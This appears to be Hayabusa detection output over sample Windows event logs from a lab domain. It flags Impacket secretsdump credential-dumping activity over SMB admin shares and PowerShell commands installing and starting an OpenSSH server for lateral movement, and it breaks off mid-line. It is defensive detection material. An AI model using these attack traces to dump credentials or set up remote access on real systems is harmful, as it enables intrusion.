+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:14.735 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:16.724 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:16.724 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:16.724 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:16.724 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:19.875 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:19.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:19.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:19.891 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:20.003 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.560 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.591 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.591 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.591 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.606 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.606 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.622 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 09:00:22.696 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 10:02:14.393 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.406 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.619 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Apply-WindowsUnattend"" ParameterBinding(Set-Alias): name=""Value""; value=""Use-WindowsUnattend""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.619 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.620 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.620 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.620 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppxPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.621 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppXDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.621 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.621 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.622 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.622 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-AppProvisionedPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.623 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-AppPackageProvisionedDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.623 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.623 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.624 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.624 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.624 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppPackageDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:02:14.627 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Cmdlet""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:16.455 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-WindowsCapability): ""Add-WindowsCapability"" ParameterBinding(Add-WindowsCapability): name=""Online""; value=""True"" ParameterBinding(Add-WindowsCapability): name=""Name""; value=""OpenSSH.Server~~~~0.0.1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:16.455 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Microsoft.Dism.Commands.ImageObject""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:16.478 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:16.480 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:37.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Write-Host 'Final result: 1';,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:37.663 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""Final result: 1""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:37.663 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:37.671 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:19:29.476 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:29.479 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-Service sshd,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:30.035 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-Service): ""Start-Service"" ParameterBinding(Start-Service): name=""Name""; value=""sshd""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:30.036 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:30.039 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:30.041 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.548 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.559 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Service -Name sshd -StartupType 'Automatic',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.590 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Service): ""Set-Service"" ParameterBinding(Set-Service): name=""Name""; value=""sshd"" ParameterBinding(Set-Service): name=""StartupType""; value=""Automatic""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.590 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.593 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.595 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:36.172 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 